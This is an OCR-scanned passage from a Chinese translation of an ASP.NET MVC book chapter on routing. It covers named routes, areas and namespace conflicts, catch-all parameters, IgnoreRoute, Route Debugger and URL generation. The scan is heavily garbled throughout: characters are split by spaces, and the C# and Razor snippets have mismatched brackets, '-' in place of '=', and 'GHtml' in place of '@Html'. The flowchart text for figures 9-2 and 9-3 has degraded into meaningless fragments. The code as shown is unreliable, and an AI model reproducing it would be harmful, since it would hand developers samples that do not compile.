运行 的 操作 。 这 就 是 笔者 通常 优先 选择 特性 路 由 的 原因 。 好 消息 是 ， 这 两 种 路 由 都 是 我 们 能 够 使 
用 的 ， 而 且 如 果 中 间 改 变 了 主意 ， 把 路 由 从 一 种 风格 改 为 另 一 种 风格 并 不 困难 。 


9.26 ”路 由 命名 


ASPNET 中 的 路 由 机 制 不 要 求 路 由 具有 名 称 ， 而 且 大 多 数 情况 下 没有 名 称 的 路 由 也 能 够 满足 
大 多 数 应 用 场合 。 通 常情 况 下 ， 为 了 生成 一 个 URL， 只 需要 抓 取 事先 已 经 定义 的 路 由 值 ， 并 把 它 
们 交 给 路 由 引擎 ， 剩 下 的 生成 工作 就 由 路 由 引擎 来 做 。 但 是 正如 本 节 将 要 介绍 的 ， 有 些 情 况 下 
使 用 这 种 方法 在 选择 生成 URL 的 路 由 时 可 能 会 产生 二 义 性 。 为 路 由 指定 名 称 可 解决 这 个 问题 ， 因 
为 这 样 可 以 在 生成 URL 时 ， 对 路 由 选择 进行 精确 控制 。 

例如 ， 假 设 应 用 程序 已 经 定义 了 以 下 两 个 路 由 : 


public static void RegisterRoutes (RouteCollection routes) 
{ 
routes .MapRoute ( 
name: "Test", 
url: "code/p/{action}/{id}", 
defaults: new { controller = "Section", action = "Index", id = "" ] 
); 
routes.MapRoute ( 
name: "Default", 
url: "{controller}/{action}/{id}", 
defaults: new { controller = "Home", action = "Index", id - "" } 
); 
} 


为 在 视图 中 生成 一 个 指向 每 个 路 由 的 超 链接 ， 我 们 编写 了 下 面 两 行 代码 : 


GHtml.RouteLink("to Test", new (controller-"section", action-"Index", id=123}) 
GHtml.RouteLink("to Default", new [controller-"Home", action-"Index", id-123]) 
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注意 上 面 的 两 个 方法 调用 不 能 指定 使 用 哪个 路 由 来 生成 链接 。 它 们 只 是 提供 了 一 些 路 由 值 ， 
来 让 ASPNET 路 由 引擎 帮助 生成 URL。 在 本 例 中 ， 正 如 所 期 望 的 ， 第 一 个 方法 生成 指向 
/code/p/Index/123 的 URL, 第 二 个 方法 生成 指向 /Home/Index/123 的 URL。 对 于 上 面 这 些 简 单 的 示例 
而 言 ， 生 成 URI 非 常 简单 ， 但 有 些 情形 却 非常 令 人 头疼 。 

假设 我 们 在 路 由 列表 的 开始 部 分 添加 了 如 下 页 面 路 由 ， 以 便 /aspx/SomePage.aspx 页 面 能 够 处 
理 URL /static/url: 


routes.MapPageRoute ("new", "static/url", "~/aspx/SomePage.aspx"); 

注意 ， 在 RegisterRoutes 方 法 中 ， 上 面 定义 的 路 由 不 能 放 在 路 由 列表 的 末尾 ， 否 则 它 就 不 能 匹 
配 传 入 的 请 求 。 为 什么 会 这 样 呢 ? 这 是 因为 默认 路 由 会 在 它 之 前 与 URL 为 对 /staticurl 的 请 求 匹配 
成 功 。 因 此 ， 需 要 把 该 路 由 放 在 路 由 列表 的 开始 部 分 ， 即 在 默认 路 由 之 前 。 


注意 这 个 问题 并 不 是 针对 使 用 WebForms 的 路 由 机 制 。 在 很 多 情况 下 , 需要 路 
由 到 非 ASP NET MVC 路 由 处 理 程序 。 


将 上 面 定义 的 路 由 移动 到 定义 路 由 列表 的 开始 位 置 ， 看 起 来 是 无 足 轻重 的 变化 ， 真 是 这 样 
吗 ? 对 于 传 入 的 请 求 而 言 ， 该 路 由 只 能 匹配 URIL 为 /static/url 的 请 求 ， 而 不 匹配 任何 其 他 的 请 求 。 
这 也 正 是 我 们 想 要 的 。 但 是 如 何 生成 URL 呢 ?如 果 回 到 前 面 查 看 两 次 调用 UrLRouteLink 返 回 的 结 
果 ， 我 们 将 会 发 现 返 回 的 两 个 URL 都 是 不 可 用 的 : 


/static/url?controller=sectiongaction=Index&id=123 
和 
/static/url?controller-Home&action-Index&id-123 


这 涉及 路 由 机 制 的 微妙 行为 ， 不 可 否认 该 微妙 行为 有 点 像 边 缘 情 况 ， 但 是 我 们 会 时 不 时 地 遇 
到 这 种 情况 。 

通常 情况 下 ， 当 使 用 路 由 生成 URL 时 ， 我 们 提供 的 路 由 值 会 被 用 来 “填充 ”本 章 前 面部 分 讨 
论 的 路 由 参数 。 

当 有 一 个 URL 模 式 为 {controller}/{action}/{id} 的 路 由 时 ， 我 们 期 望 在 生成 URL 时 ， 能 够 为 
controller、action 和 id 提供 值 。 在 这 种 情形 下 ， 由 于 新 路 由 没有 路 由 参数 ， 因 此 它 可 以 匹配 每 一 个 
可 能 生成 的 URL， 因 为 从 技术 层面 上 讲 ,“ 路 由 值 是 为 每 一 个 URL 参 数 提供 的 "。 这 里 碰巧 新 路 由 
没有 路 由 参数 。 这 也 正 是 所 有 已 有 URI 不 可 用 的 原因 ， 也 就 是 说 ， 生 成 URL 的 每 一 次 尝试 都 可 以 
匹配 这 个 新 路 由 。 

尽管 看 起 来 这 是 一 个 大 问题 ， 但 是 其 修正 起 来 却 非常 简单 。 只 需要 对 所 有 路 由 都 使 用 名 称 ， 
并 且 在 生成 URL 时 指定 路 由 名 称 。 大 多 数 时 候 ， 让 路 由 机 制 挑选 出 用 来 生成 URL 的 路 由 完全 是 随 
机 的 ， 而 且 不 一 定 能 挑选 出 开发 人 员 所 期 望 的 路 由 。 当 生成 URL 时 ， 我 们 通常 明确 地 知道 自己 想 
要 的 路 由 ， 因 此 ， 我 们 可 以 通过 名 称 来 指定 它 。 如 果 需 要 使 用 匿名 路 由 ， 将 URL 生 成 完全 交 给 路 
由 机 制 ， 笔 者 推荐 在 应 用 程序 中 编写 单元 测试 来 验证 路 由 和 URIL 生 成 的 期 望 行为 。 

指定 路 由 名 称 不 仅 可 以 有 效 地 避免 二 义 性 ， 甚 至 还 可 以 在 某 种 程度 上 提高 性 能 ， 因 为 路 由 引 
擎 可 以 直接 定位 到 指定 的 路 由 ， 并 尝试 用 它 来 生成 URL。 

在 前 面 的 示例 中 ， 我们 生成 了 两 个 链接 ， 下 面 的 代码 针对 上 述 问题 进行 了 修改 。 为 了 可 以 清 


楚 地 看 到 使 用 的 路 由 ， 下 面 的 代码 使 用 了 命名 参数 : 


QHtml.RouteLink( 
linkText: "route: Test", 
routeName: "test", 
routeValues: new (controller-"section", action-"Index", id-123) 


) 


GHtml.RouteLink( 

linkText: "route: Default", 

routeName: "default", 

routeValues: new (controller-"Home", action-"Index", id-123) 
) 


对 于 特性 路 由 ， 可 在 特性 上 将 名 称 指定 为 可 选 参数 : 
[Route ("home/(action)", Name = "home")] 


生成 特性 路 由 的 链接 的 方式 与 传统 路 由 相同 。 

与 传统 路 由 不 同 ， 特 性 路 由 中 的 路 由 名 称 是 可 选 的 。 笔 者 建议 ， 除 非 需 要 生成 路 由 链接 ， 否 
则 不 要 提供 路 由 名 称 。MVC 在 后 台 会 做 额外 的 一 些 工作 来 支持 为 命名 的 特性 路 由 生成 链接 ， 如果 
特性 路 由 未 命名 ，MVC 会 跳 过 这 些 工 作 。 

正如 保加利亚 著名 小 说 家 Elias Canett 所 说 :“ 人 们 的 名 字 是 他 们 命运 的 缩写 ”。 这 句 话 同样 适 
用 于 生成 URL 的 路 由 。 


9.2.7 MVC 区 域 


APSNETMVC 2 中 引入 了 区 域 的 概念 ， 它 允许 我 们 将 模型 、 视 图 和 控制 器 分 成 单独 的 功能 
点 。 这 就 意味 着 我 们 可 以 把 大 型 复杂 的 网 站 分 成 若干 个 节点 ， 以 方便 管理 。 


1. 区 域 路 由 注册 


我 们 可 以 通过 为 每 一 个 区 域 创建 类 来 配置 区 域 路 由 ， 所 创建 的 类 要 派生 自 AreaRegistation 类 ， 还 要 
重 写 其 中 的 AreaName 和 ResgisterArea 成 员 。 在 ASPNET MVC 默 认 的 项 目 模板 中 ，Globalasax 文 件 
中 的 Application_Start 方 法 中 存在 对 AreaResgistration ResgisterAllAreas 方 法 的 调用 。 


2. 区 域 路 由 冲突 


如 果 我 们 有 两 个 相同 名 称 的 控制 器 ， 其 中 一 个 在 区 域 中 ， 另 一 个 在 应 用 程序 的 根 目录 下 ， 那 
么 当 传 入 的 请 求 匹配 没有 指定 名 称 空间 的 路 由 时 ， 系 统 会 抛 出 异常 ， 并 给 出 一 条 宛 长 的 错误 提示 
消息 : 


系统 发 现 多 个 名 为 “Home” 的 控制 器 ， 可 以 用 来 匹配 该 请 求 。 如 果 响 应 该 请 求 
({controller}/{action}/{id}) 的 路 由 没有 指定 要 查找 的 、 用 来 匹配 请 求 的 控制 器 名 称 空间 ， 就 可 能 会 
导致 该 异常 产生 。 如 果真 是 这 样 ， 请 调用 带 有 “namespaces” 参 数 的 “MapRoute” 方 法 的 重 载 版 
本 以 注册 该 路 由 。 


Multiple types were found that match the controller named 'Home'. 
This can happen if the route that services this request 
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('(controller)/(action)]/[id])') does not specify namespaces to search for a 
controller that matches the request. 

If this is the case, register this route by calling an overload of the 
'MapRoute' method that takes a 'namespaces' parameter. 

The request for 'Home' has found the following matching controllers: 


对 Home' 的 请 求 已 经 发 现 了 下 面 匹 配 的 控制 器 : 


AreasDemoWeb.Controllers.HomeController 
AreasDemoWeb.Areas.MyArea.Controllers.HomeController 


当 使 用 Add Area 对 话 框 添加 区 域 时 ， 框 架 会 相应 地 在 该 区 域 的 名 称 空间 中 为 新 区 域 注册 一 个 
路 由 。 这 样 就 保证 只 有 新 区 域 中 的 控制 器 才能 匹配 新 路 由 。 

名 称 空间 可 以 缩小 匹配 路 由 时 控制 器 的 候选 集 。 如 果 路 由 指定 了 匹配 的 名 称 空间 ， 那 么 只 有 
在 这 个 名 称 空间 中 的 控制 器 才 有 可 能 与 该 路 由 匹配 。 相 反 ， 如 果 路 由 没有 指定 名 称 空间 ， 那 么 程 
序 中 所 有 的 控制 器 都 有 可 能 与 该 路 由 匹配 。 
在 路 由 没有 指定 名 称 空间 的 情况 下 ， 很 容易 导致 二 义 性 ， 即 两 个 同名 的 控制 器 同时 匹配 一 个 


路 由 。 
阻止 该 异常 的 一 种 方法 是 ， 在 整个 项 目 中 使 用 唯一 的 控制 器 名 称 。 然 而 ， 我 们 可 能 有 时 候 想 
使 用 相同 的 控制 器 名 称 (例如 ， 我 们 不 想 影响 生成 的 路 由 URL)。 这 种 情形 下 ， 可 以 对 特定 的 路 由 
指定 一 组 用 来 定位 控制 器 类 的 名 称 空间 。 下 面 的 代码 显示 了 使 用 传统 路 由 时 的 做 法 : 


routes.MapRoute( 
"Default", 
"(controller]/(action)/(id)", 
new ( controller = "Home", action = "Index", id = "" }, 
new [] { "AreasDemoWeb.Controllers" } 


) 7 

上 述 代 码 使 用 第 4 个 参数 来 指定 一 个 名 称 空间 数组 。 从 上 面 的 代码 可 以 看 出 ， 示 例 项 目的 控 
制 器 全 都 定义 在 AreasDemoWeb.Controllers 名 称 空间 中 。 

为 在 特性 路 由 中 利用 区 域 ， 需 要 使 用 RouteArea 特 性 。 在 特性 路 由 中 ， 不 需要 指定 名 称 空间 ， 
因为 MVC 会 完成 确定 名 称 空间 的 工作 (特性 放 到 了 控制 器 上 ， 而 控制 器 知道 它 自己 的 名 称 空间 )。 
我 们 需要 做 的 是 在 RouteArea 特 性 中 指定 AreaRegistration 的 名 称 。 

[RouteArea ("admin")] 
[Route ("users/(action)")] 


public class UsersController : Controller 
t 


// Some action methods 


) 
默认 情况 下 ， 这 个 类 的 所 有 特性 路 由 使 用 区 域名 称 作为 路 由 前 级 。 因 此 ， 上 面 的 路 由 用 于 
/admin/users/index 这 样 的 URL。 如 果 想 使 用 一 个 不 同 的 路 由 前 级 ,可 以 使 用 可 选 的 AreaPrefix 属 性 : 


[RouteArea ("admin", AreaPrefix = "manage")] 
[Route ("users/{action}")] 


这 段 代码 会 使 用 /manage/users/index 这 样 的 URL。 与 使 用 RoutePrefix 定 义 的 前 级 一 样 ， 通 过 以 
~/ 字 符 开 始 路 由 模板 ， 就 不 必 输 入 RouteArea 前 级 。 


232 


© 注意 如 果 试图 在 一 个 区 域 中 结合 使 用 传统 路 由 和 特性 路 由 ， 就 必须 特别 注意 

路 由 的 顺序 。 前 面 提 到 过 ， 笔 者 建议 在 路 由 表 中 ， 把 特性 路 由 放 到 传统 路 由 之 前 。 
如 果 查 看 Globalasax 文 件 的 Application Start 方 法 中 的 默认 代码 ， 会 注意 到 对 
AreaRegistration 的 调用 。RegisterAllAreas() 出 现在 RegisterRoutes 之 前 。 这 意味 着 在 
区 域 的 RegisterArea() 方 法 中 创建 的 任何 传统 路 由 出 现在 RegisterRoutes 中 创建 的 路 由 
之 前 ， 包 括 通过 调用 MapMvcAttributeRoutes 创建 的 任何 特性 路 由 。 让 
RegisterAllAreas() 出 现在 RegisterRoutes 之 前 很 合理 ， 因 为 区 域 的 传统 路 由 要 比 
RegisterRoutes 中 的 非 区 域 路 由 更 具体 。 但 是 ， 特 性 路 由 则 要 更 加 具体 ， 所 以 本 例 中 
要 在 RegisterRoutes 之 前 映射 特性 路 由 。 在 这 种 情形 下 ， 笔 者 建议 将 
MapMvcAttributeRoutes 调 用 移出 RegisterRoutes 方 法 ， 使 其 成 为 Application Start 中 的 
第 一 个 调用 : 

RouteTable.Routes .MapMvcAttributeRoutes () 7 


AreaRegistration.RegisterAllAreas(); 
// Other registration calls, including RegisterRoutes 


9.2.8 ”catch-all 参 数 


catch-all 参 数 允 许 路 由 匹配 具有 任意 个 段 的 URL。 参 数 中 的 值 是 不 含 查询 字符 串 的 URL 路 径 
的 剩余 部 分 。catch-all 参 数 只 能 作为 路 由 模板 的 最 后 一 段 。 

例如 ， 下 面 的 传统 路 由 能 够 处 理 表 9-4 中 所 示 的 请 求 : 

public static void RegisterRoutes (RouteCollection routes) 

{ 


routes.MapRoute ("catchallroute", "query/{query-name}/{*extrastuff}"); 
) 


特性 路 由 使 用 相同 的 语法 。 在 参数 名 的 前 面 添加 一 个 星 号 (*)， 就 可 以 让 它 成 为 一 个 catch-all 


表 9-4 ”catch-all 路 由 请 求 


URL 参 数 值 

/query/select/a/b/c extrastuff — "a/b/c" 

/query/select/a/b/c/ extrastuff — "a/b/c/" 

/query/select/ extrastuff = null (路 由 仍然 匹配 ，“catch-all” 只 捕获 了 示例 中 的 空 字符 串 ) 


9.29 段 中 的 多 个 路 由 参数 


正如 前 面 提 到 的 ， 路 由 URL 的 每 个 段 中 都 可 能 含有 多 个 参数 。 例 如 ， 下 面 列 出 的 都 是 有 效 
URL: 
e (title)- (artist) 
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e Album{title}and {artist} 

e {fiename}.{ext} 

为 避免 产生 二 义 性 ， 我 们 规定 参数 不 能 临近 。 例 如 ， 下 面 列 出 的 路 由 URL 都 是 无 效 的 : 

e {title} (artist) 

e Download(filename] {ext} 

路 由 URI 在 与 传 入 的 请 求 匹配 时 ， 它 的 字面 值 是 与 请 求 精确 匹配 的 ， 而 其 中 的 路 由 参数 是 贪 
禁 匹 配 的 , 这 与 正则 表达 式 有 同样 的 含义 。 换言之, 路 由 使 每 个 路 由 参数 都 尽 可 能 多 地 匹配 文本 。 

例如 ， 路 由 {flename}.{ext} 是 如 何 匹 配 /asp.net.mvc.xml 请 求 的 呢 ?” 如 果 {flename} 参 数 不 是 
贪 禁 匹 配 的 ， 那 么 它 只 需要 匹配 ssp， 而 由 {ex 参数 匹配 剩 下 的 netmvcxml。 但 是 因为 路 由 参数 
要 求 贪 禁 匹配 ， 所 以 {flename} 参 数 会 尽 可 能 地 匹配 它 能 匹配 的 文本 一 asp. netmvc。 它 不 能 再 匹 
配 更 多 的 了 ， 因 为 必须 为 .fext} 部 分 留 下 匹配 空间 ， 即 .{ext} 匹 配 URL 的 剩余 部 分 一 xml。 

表 9-5 展 示 了 各 种 带 有 多 个 参数 的 路 由 URL 匹 配 请 求 的 方式 。 


表 9-5 ”多 参数 路 由 URL 的 匹配 


路 由 URL 路 由 数据 的 结果 


{filename}. {ext} /Foo.xml.aspx filename="Foo.xml" 

ext-"aspx" 
Myf(locationj-(sublocation] | /MyHouse-dwelling location-"House" 
(foo) xyz(barj /xyzxyzxyzblah foo-"xyzxyz" 


注意 在 第 一 个 示例 中 ， 当 匹配 URL“/Fooxmlaspx” 时 ，{6lename} 参 数 没 有 在 第 一 个 “.” 字 
符 处 终止 匹配 。 否 则 ， 它 将 只 匹配 字符 串 “Foo.”。 相 反 ， 它 匹配 了 字符 串 “Foo.xml”。 


9.2.10 ”StopRoutingHandler 和 lgnoreRoute 


默认 情况 下 , 路 由 机 制 会 忽略 那些 映射 到 磁盘 物理 文件 的 请 求 。 这 也 正 是 那些 对 文件 (如 CSS、 
JPG 和 JS 文件 ) 的 请 求 被 路 由 忽略 ， 而 由 系统 正常 处 理 的 原因 。 

但 在 一 些 应 用 场合 中 ， 一 些 不 能 映射 到 磁盘 文件 的 请 求 也 不 需要 路 由 来 处 理 。 例 如 ， 对 于 
ASPNET 的 Web 资 源 处 理 程序 一 WebResource axd- 一 的 请 求 , 是 由 一 个 HITP 处 理 程序 来 处 理 的 ， 
而 它们 并 没有 对 应 到 磁盘 上 的 文件 。 

StopRoutingHandler 可 以 确保 路 由 忽略 这 种 请 求 。 下 面 的 示例 展示 了 手动 添加 路 由 的 方法 ， 即 
通过 使 用 一 个 新 的 StopRoutingHandler 来 创建 路 由 ， 并 把 创建 的 路 由 添加 到 RouteCollection 中 。 

public static void RegisterRoutes (RouteCollection routes) 

{ 


routes.Add (new Route 


( 


" {resource} .axd/{*pathInfo}", 
new StopRoutingHandler () 


routes .Add (new Route 


( 
"reports/(year]/(month]" 
, new SomeRouteHandler () 
)); 

} 

如 果 传 入 了 URI 为 /WebResource axd 的 请 求 ， 那 么 它 会 与 第 一 个 路 由 相 匹 配 。 因 为 第 一 个 路 

由 返回 一 个 StopRoutingHandler 对 象 ， 所 以 路 由 会 继续 把 该 请 求 传递 给 标准 的 ASPNET 处 理 程序 。 
在 本 例 中 ， 最 终 将 回 到 用 于 处 理 .axd 扩 展 的 标准 HTTP 处理 程序 。 
比 外 ， 还 有 一 种 更 简单 的 方法 可 使 路 由 机 制 忽略 指定 路 由 。 即 JIgnoreRoute， 与 之 前 看 到 的 
MapRoute 类 似 , 它 是 添加 到 RouteCollection 类 型 中 的 扩展 方法 。 该 方法 和 MapRoute 方 法 一 起 使 用 ， 
可 以 方便 地 修改 上 面 的 代码 ， 修 改 后 的 代码 如 下 所 示 : 

public static void RegisterRoutes (RouteCollection routes) 

{ 

routes.IgnoreRoute ("(resource].axd/(*pathInfo)"); 
routes.MapRoute ("report-route", "reports/(year)/(month]"); 
) 


上 述 代 码 看 起 来 更 简洁 ， 更 便于 理解 。 后 面 我 们 将 会 在 ASPNETMVC 的 很 多 地 方 看 到 , 使 用 
MapRoute 和 IegnoreRoute 这 样 的 扩展 方法 可 让 代码 变 得 更 加 整洁 。 


9.2.11 ”路 由 的 调试 


过 去 ， 路 由 的 调试 问题 很 令 人 泪 丧 ， 因 为 路 由 是 被 ASPNET 的 内 部 路 由 处 理 逻 辑 解析 的 ， 不 
在 Visual Studio 断 点 的 范围 内 。 路 由 中 的 错误 会 中 断 程序 的 运行 ， 因为 它 可 能 调用 一 个 不 正确 或 者 
根本 不 存在 的 控制 器 操作 。 调 试问 题 可 能 更 加 令 人 困惑 ， 因 为 路 由 是 按 先后 顺序 匹配 的 ， 且 第 一 
个 匹配 成 功 的 路 由 生效 ， 所 以 错误 可 能 不 在 路 由 定义 中 ， 而 是 该 路 由 没有 在 路 由 列表 中 的 正确 位 
置 上 。 可 喜 的 是 ， 这 一 切 令 人 沁 表 的 调试 问题 ， 出 现在 笔者 编写 Route Debugger 之 前 。 

启用 Route Debugger 后 ， 它 会 用 一 个 DebusRouteHandler 蔡 换 所 有 路 由 处 理 程序 。 
DebugRouteHandler 截 获 所 有 传 入 的 请 求 ， 并 查询 路 由 表 中 的 每 一 个 路 由 ， 以 便 在 页 面 底部 显示 路 
由 的 诊断 数据 和 参数 。 

为 使 用 RouteDebugger， 只 需要 在 Visual Studio 的 Package Manager Console 窗 口中 使 用 NuGet 安 
装 即 可 ， 命 令 为 nstallPackageRouteDebugger。RouteDebugger 包 在 添加 Route Debugger 程 序 集 的 同 
时 ， 也 在 web.config 文 件 的 appSettings 节 点 中 添加 了 一 个 设置 ， 用 来 开启 或 禁用 路 由 调试 。 


«add key-"RouteDebugger:Enabled" value-"true" /> 


只 要 启用 Route Debugger, 它 就 显示 从 (在 地 址 栏 中 ) 当 前 请 求 URL 中 提取 的 路 由 数据 , 如 图 9-1 
所 示 。 这 样 我 们 就 可 以 在 地 址 栏 中 输入 各 种 URL， 并 查看 输入 的 URIL 能 与 哪个 路 由 匹配 。 在 页 面 
底部 ， 它 还 会 展示 一 个 包含 应 用 程序 定义 的 所 有 路 由 的 列表 。 这 样 我 们 就 可 以 查看 定义 的 哪个 路 
由 能 够 与 当前 URL 相 匹配 。 
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(P) 汪 Eomae Dabugga 提 供 了 完 于 资源 pb 读者 中 修改 Rouie Debugger 
来 输出 任何 其 他 相关 数据 .例如 , Stephen Walther 使 用 Route Debugger 作 为 Route Debugger 
Controller 的 基础 。 因 为 Route Debugger Controller 是 在 控制 器 级 别 引 入 的 ， 所 以 它 只 
能 处 理 匹配 路 由 ， 尽 管 这 样 从 纯粹 的 调试 方面 减弱 了 它 的 强大 功能 ， 但 是 这 样 也 带 
来 了 一 个 好 处 ,就 是 在 不 禁用 路 由 机 制 的 情况 下 就 可 以 使 用 它 。 我们 可 以 使 用 Route 
Debugger Controller 来 在 已 知 的 路 由 上 执行 自动 测试 。 可 以 从 Stephen 的 博客 中 下 载 
Route Debugger Controller， 网 址 为 http://tinyurl.com/RouteDebuggerController。 


图 9-1 


9.3 ”揭秘 路 由 如 何 生成 URL 


到 目前 为 止 , 本 章 已 经 重点 介绍 了 路 由 如 何 匹配 传 入 的 请 求 URL, 这 是 路 由 的 一 个 主要 职责 。 
路 由 机 制 的 另 一 个 主要 职责 是 构造 与 特定 路 由 对 应 的 URL。 在 生成 URL 时 ， 生 成 URL 的 请 求 应 该 
首先 与 选择 用 来 生成 URL 的 路 由 相 匹 配 。 这 样 路 由 就 可 以 在 处 理 传 入 或 传 出 的 URL 时 成 为 完整 的 
双向 系统 。 


(2) 注意 ”我 们 不 妨 花 点 时 间 仔细 揣摩 两 句 话 :“ 在 生成 URL 时 ,生成 URI 的 请 求 应 
该 首先 与 选择 用 来 生成 URL 的 路 由 相 匹配 。 这 样 路 由 就 可 以 在 处 理 传 入 或 传 出 的 
URL 时 成 为 完整 的 双向 系统 .” 这 两 句 话 使 得 路 由 和 URI 重 写 之 间 的 区 别 变 得 清晰 。 
让 路 由 系统 生成 URL 不 仅 分 离 了 模型 、 视 图 和 控制 器 之 间 的 关注 点 ， 同 时 也 分 离 了 
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原则 上 , 开发 人 员 应 该 提供 一 组 路 由 值 , 以 便 路 由 系统 从 中 选择 第 一 个 能 够 匹配 URI 的 路 由 。 
9.3.1 URL 生 成 的 高 层次 概述 


路 由 的 核心 是 一 个 非常 简单 的 算法 ， 该 算法 基于 一 个 由 RouteCollecion 类 和 RouteBase 类 组 成 的 简 
单 抽象 对 象 。 在 深入 学 习 路 由 如 何 与 复杂 Route 类 交互 之 前 ， 我 们 首先 学 习 路 由 是 如 何 使 用 这 些 
类 的 。 

可 以 采用 多 种 方法 来 生成 URL, 但 这 些 方法 都 以 调用 RouteCollection GetVirtualPath 的 一 个 重 载 方 
法 而 结束 。RouteCollection.GetVirtualPath 方 法 共有 两 个 重 载 版 本 ， 下 面 的 代码 展示 了 它们 的 方法 
签名 : 

public VirtualPathData GetVirtualPath (RequestContext requestContext, 

RouteValueDictionary values) 

public VirtualPathData GetVirtualPath(RequestContext requestContext, 

string name, RouteValueDictionary values) 

第 一 个 重 载 版 本 接收 当前 的 RequestContext， 以 及 由 用 户 指定 的 路 由 值 (字典 )。 

(1) 路 由 集合 通过 RouteBase.GetVirtualPath 方 法 遍历 每 个 路 由 并 询问 :“ 你 可 以 生成 给 定 参 数 的 
URL 吗 ”。 这 个 过 程 类 似 于 在 路 由 与 传 入 请 求 匹配 时 所 运用 的 匹配 逻辑 。 

(2 如果 一 个 路 由 可 以 应 答 上 面 的 问题 ( 即 匹配 )， 那 么 它 就 返回 一 个 包含 了 URL 的 
VirtualPathData 实 例 以 及 其 他 匹配 信息 。 否则 , 它 就 返回 空 值 , 路 由 机 制 移 向 列表 中 的 下 一 个 路 由 。 

第 二 个 重 载 版 本 接收 三 个 参数 ， 其 中 第 二 个 参数 是 路 由 名 称 。 在 路 由 集合 中 路 由 名 称 是 唯一 
的 ， 也 就 是 说 ， 没 有 两 个 不 同 的 路 由 具有 相同 的 名 称 。 当 指定 了 路 由 名 称 时 ， 路 由 集合 就 不 需要 循 
环 遍 历 每 个 路 由 。 相 反 ， 它 可 以 立即 找到 指定 名 称 的 路 由 ， 并 移 向 上 面 的 步骤 (2)。 如 果 找 到 的 路 由 
不 能 匹配 指定 的 参数 ， 该 方法 就 会 返回 空 值 ， 并 且 不 再 匹配 其 他 路 由 。 


9.32 URL 生 成 详解 
Route 类 提供 了 前 面 高 层次 算法 的 具体 实现 。 


简单 示例 

这 是 大 部 分 开发 人 员 在 使 用 路 由 机 制 时 遇 到 的 逻辑 ， 下 面 对 其 进行 详细 阐述 ; 

(1) 开发 人 员 调用 像 HtmlLActionLink 或 UrLAction 之 类 的 方法 ， 这 些 方法 反 过 来 再 调用 
RouteCollection GetVirtualPath 方 法 ， 并 向 它 传递 一 个 RequestContext 对 象 、 一 个 包含 值 的 字典 以 及 
用 来 选择 生成 URIL 的 路 由 名 称 (可 选 参数 )。 

D 路 由 机 制 查看 要 求 的 路 由 参数 ( 即 没有 提供 路 由 参数 的 默认 值 ), 并 确保 提供 的 路 由 值 字典 
为 每 一 个 要 求 的 参数 提供 一 个 值 。 否 则 ，URL 生 成 程序 会 立即 停止 ， 并 返回 空 值 。 

(3) 一 些 路 由 可 能 包含 没有 对 应 路 由 参数 的 默认 值 。 例 如 ， 路 由 可 能 为 category 键 提供 默认 值 
"pastries"， 但 是 category 不 是 路 由 URL 的 一 个 参数 。 这 种 情况 下 ， 如 果 用 户 传 入 的 路 由 值 字典 为 
category 提 供 了 一 个 值 ， 那 么 该 值 必须 匹配 category 的 默认 值 。 图 9-2 展 示 了 一 个 流程 图 示例 。 
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RouteCollection.GetVirtualPath( 提 供 的 值 ) 


必需 的 参数 是 指 没 有 提供 默认 值 的 URL 
参数 。 


5 路 由 有 必需 的 参数 吗 ? 示例 : 
路 由 URL={action}/{type} 
是 Defaults = type-"list" 
| faction} 是 必需 的 , 因为 它 没有 默认 值 , 但 
ftype} 不 是 必 怖 的 ， 因 为 它 具有 默认 值 


否 | 对 GetVirtualPath 方法 的 调用 为 
每 个 必需 的 参数 指定 值 了 吗 ? 


不 匹配 ]: 路 由 URL {foo}/{bar} 
如 果 用 户 提 供 foo="anything"， 
一 一 > 路 由 为 URL 中 没有 出 现 的 参数 提供 默认 那么 {bar}( 这 是 必需 的 ) 没 有 指定 值 ， 因 此 
值 了 吗 ? 不 匹配 。 
a | 示例 : 用 户 需 要 指定 
[— URL= {foo}/{bar} foo-"valuel" Hbar-"value2". 


defaults = foo="xyz", controller-"home" 
其 中 ，controller-"home" 是 默认 值 ， 但 
URL 中 没有 出 现 {controller} 参 数 


是 
| 路 由 URL= todo/{action} 
. . 默认 = controller-"home" 
TUR [e| MU CH dii d K action="index" 
定 的 值 匹配 吗 ? 用 户 指定 controller-"blah" 


action=anything 一 不 匹配 


是 controller-"home" 
action-"any" ”一 不 匹配 
3 路 由 有 约束 吗 ? action="any” ”一 不 匹配 
是 
转 入 图 9-3 
图 9-2 


(4) 然后 路 由 系统 应 用 路 由 的 约束 ， 如 果 有 的 话 ， 请 参阅 图 9-3。 
(5) 路 由 匹配 成 功 ! 现在 可 以 通过 查看 每 一 个 路 由 参数 ， 并 尝试 利用 字典 中 的 对 应 值 填充 相 


9.333 ”外 界 路 由 值 
在 一 些 情形 中 ，URL 生 成 程序 还 可 以 利用 那些 不 是 显 式 提供 给 GetVirtualPath 方 法 的 值 。 下 面 
让 我 们 看 一 个 示例 : 


简单 示例 

假如 现在 想 展示 一 个 大 的 任务 列表 。 我 们 想 让 用 户 通过 链接 一 页 一 页 地 浏览 任务 ， 而 不 是 将 
任务 同时 全 都 展现 在 页 面 上 。 例 如 ， 图 94 展 示 了 一 个 简单 的 包含 任务 列表 的 用 户 界 面 ， 该 任务 列 
表 可 用 于 逐 页 浏览 任务 。 
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路 由 有 约束 吗 ? 


调用 匹配 方法 ， 是 约束 实现 了 
传递 提供 的 值 el IRouteConstraint 吗 ? 


e 
RE 


匹配 函数 "5 否 | 如 果 路 由 是 字符 串 ， 那 么 
返回 tue 吗 ? | 不 匹配 Re 一 | 把 它 看 成 正则 表达 式 ， 正 
- 则 表达 式 匹配 吗 ? 
EE z 
y > 
Se J ----------------- E 
匹配 所 有 约束 


获得 匹配 ! 使 用 对 应 值 蔡 代 每 个 
URL 参数 (提供 的 值 或 默认 值 ) 


图 9-3 


My Tasks 


© 2013 - My ASP.NET Application 


图 9-4 
该 请 求 的 路 由 数据 如 表 9-6 所 示 。 
表 9-6 ”路 由 数据 
键 值 
Controller Tasks 
Action List 
Page 2 
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为 了 生成 下 一 页 的 URL， 只 需要 在 新 请 求 中 指定 将 要 改变 的 路 由 数据 : 
QHtml .ActionLink ("Page 2", "List", new { page = 2 }) 


尽管 对 ActionLink 方 法 的 调用 只 提供 了 page 参 数 , 但 是 在 执行 路 由 查找 时 ， 路 由 机 制 可 以 使 用 
为 控制 器 和 操作 提供 的 外 界 路 由 数据 值 。 对 于 当前 请 求 而 言 ，RouteData 中 的 外 界 值 就 是 这 些 参 
数 的 当前 值 。 当 然 ， 显 式 地 为 控制 器 和 操作 提供 的 值 会 覆盖 外 界 值 。 为 在 生成 URL 时 不 设置 
